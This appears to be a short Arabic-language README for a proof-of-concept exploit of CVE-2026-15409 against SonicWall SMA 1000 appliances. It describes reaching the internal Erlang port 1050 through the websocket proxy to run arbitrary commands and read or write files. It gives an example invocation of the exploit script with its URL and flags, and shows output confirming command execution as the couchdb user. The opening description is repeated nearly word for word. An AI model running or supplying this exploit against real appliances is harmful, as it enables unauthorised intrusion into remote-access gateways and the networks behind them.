
يحتوي هذا المستودع على إثبات مفهوم لاستغلال الثغرة CVE-2026-15409. يقوم بإنشاء تنفيذ تعليمات برمجية عن بُعد بدون صلاحيات الجذر على SonicWall SMA 1000 من خلال تنفيذ بروتوكول Erlang المتوقع بواسطة localhost:1050 وتوجيهه عبر websocket لقراءة/كتابة الملفات وتنفيذ تعليمات برمجية عشوائية عبر استدعاءات RPC.
يحتوي هذا المستودع على إثبات لمفهوم استغلال الثغرة CVE-2026-15409. يقوم بتأسيس تنفيذ تعليمات برمجية عن بُعد بدون صلاحيات الجذر على SonicWall SMA 1000 من خلال تنفيذ بروتوكول Erlang المتوقع بواسطة localhost:1050 وتوجيهه عبر websocket لقراءة/كتابة الملفات وتنفيذ تعليمات برمجية عشوائية عبر استدعاءات RPC.
# python3 cve-2026-15409.py --ws-url 'wss://192.168.1.46/wsproxy?bmID=-3389c1b25ccd&serviceType=SSH&host=0.0.0.0&port=1050' --ws-user-agent 'SMA Connect Agent' --ws-insecure-tls --exec 'whoami && id && pwd && hostname'
Authenticated to [email protected]
Peer flags: 0xd07df7fbd
Peer creation: 1784069352
RPC os:cmd/1 => couchdb
uid=1010(couchdb) gid=1(daemon) groups=1(daemon)
/opt/couchdb
SMAAppliance.sma